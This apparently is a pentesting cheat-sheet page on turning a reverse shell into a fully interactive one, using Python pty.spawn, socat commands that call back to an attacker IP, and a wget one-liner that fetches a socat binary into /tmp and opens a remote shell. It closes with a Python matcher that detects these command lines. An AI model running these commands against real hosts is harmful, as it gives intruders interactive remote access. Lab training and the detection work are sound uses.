# Upgrading Shells

## Python

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

![Upgrading the shell to interactive with Python](https://1388945775-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFIKgv6vXe0ADXGiuAMfQ%2Fuploads%2F7CIGcX81Ay0Z9JH2o5ey%2F1f9de5acdf8a4540a8533c61523298fb.png?alt=media\&token=91fc0956-2a2f-4bb2-8930-50ad1ad3d9f6)

## Socat

#### On Kali (Attacking Machine)

```
socat file:`tty`,raw,echo=0 tcp-listen:4444
```

#### On Victim Machine

```
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```

![Using Socat to Upgrade the shell](https://1388945775-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFIKgv6vXe0ADXGiuAMfQ%2Fuploads%2FioNHxO5rVuHG1LKpsXHE%2Fsocat_upgrade_shell.png?alt=media\&token=5150f07c-9db5-4bb8-a0de-0ae5449bb2b7)

#### On Victim Machine with no Socat

We will need to download a precompiled binary of socat from <https://github.com/andrew-d/static-binaries>.

We then download the chosen binary into a folder that we have read and write control over:

```
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```

## Upgrading with Magic

We can upgrade a shell with "magic"\
The shell will be fully interactive and have synta\
The first step is to get the shell while in a bash command prompt (this cannot be done in ZSH; switch the shell with /bin/bash before connecting to the shell)

![](https://1388945775-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFIKgv6vXe0ADXGiuAMfQ%2Fuploads%2FUJzDz80Vcn2zfcui4xXp%2Fbinbash.png?alt=media\&token=cd089a8e-72a7-4de3-9623-b9998ff6a45a)

Then upgrade it with the Python trick

![Upgrade the shell with Python](https://1388945775-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFIKgv6vXe0ADXGiuAMfQ%2Fuploads%2FuM3JOfioKobIhEDLrhQz%2Fstep%201.png?alt=media\&token=c93514fb-e059-4a96-9396-9374b9e1fd28)

We then background the shell with Ctrl + Z

![backgrounding with ctrl z](https://1388945775-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFIKgv6vXe0ADXGiuAMfQ%2Fuploads%2FSsi2MbqsuAJWXZguxsEV%2Fbackground_netcat.png?alt=media\&token=89da7b93-2f6b-45d8-95bf-892ac539732d)

We then issue the commands on our Kali machine, taking note of the values, as we will need them for input on the victim machine

![](https://1388945775-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFIKgv6vXe0ADXGiuAMfQ%2Fuploads%2FkuiEvHClHKMaDmjSc5em%2F2022-02-07%2017_19_52-Window.png?alt=media\&token=7fbfed71-02a9-474c-96c6-42e8d373900f)

We then foreground with `fg` and enter the commands to reset the console

![resetting the terminal](https://1388945775-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFIKgv6vXe0ADXGiuAMfQ%2Fuploads%2FzhFXNqQMgrPMkB3DmTap%2Ffg_reset.png?alt=media\&token=87986c52-0caa-4080-b7f4-c214bb04653f)

#### The commands

```
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
```
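
#### Detecting these commands on the target host

The Python and socat commands above leave recognisable process command lines on the machine where they run. The following is an added example, not part of the original notes: a small matcher run over constructed process-creation command lines, such as an EDR or auditd pipeline might record. The rule names, the writable-directory list and the benign sample lines are assumptions.

```python
import re
import shlex

PTY_SPAWN = re.compile(r"\bpty\.spawn\s*\(")
EXEC_ADDR = re.compile(r"^(exec|system):", re.I)
NET_ADDR = re.compile(r"^(tcp|tcp4|tcp6|tcp-connect|openssl|openssl-connect):", re.I)
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # assumed list, tune per host

def classify(cmdline):
    """Return the set of rule names matched by one process command line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:              # unbalanced quotes in the log field
        argv = cmdline.split()
    if not argv:
        return set()
    hits = set()
    prog = argv[0].rsplit("/", 1)[-1]
    # Rule 1: python -c '<code>' where the code allocates a PTY for a child.
    if re.fullmatch(r"python[\d.]*", prog) and "-c" in argv[:-1]:
        if PTY_SPAWN.search(argv[argv.index("-c") + 1]):
            hits.add("python-pty-spawn")
    if prog == "socat":
        addrs = [a for a in argv[1:] if not a.startswith("-")]
        execs = [a for a in addrs if EXEC_ADDR.match(a)]
        # Rule 2: a program run on a PTY and wired to an outbound socket.
        if any("pty" in a.lower().split(",") for a in execs) and any(
                NET_ADDR.match(a) for a in addrs):
            hits.add("socat-pty-shell-to-network")
        # Rule 3: socat binary executed from a world-writable directory.
        if argv[0].startswith(WRITABLE_DIRS):
            hits.add("socat-from-writable-dir")
    return hits

def scan(lines):
    """Return (cmdline, sorted rule names) for every line that matched."""
    return [(l, sorted(h)) for l in lines if (h := classify(l))]

# Constructed sample: one command line per process-creation event.
SAMPLE = [
    "python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "python3 -c 'import sys; print(sys.version)'",
    "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444",
    "/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444",
    "socat tcp-listen:8080,fork tcp:192.0.2.10:80",
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

The benign `python3 -c` call and the plain socat port forward are not flagged, because the rules key on the PTY allocation rather than on the program name alone.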
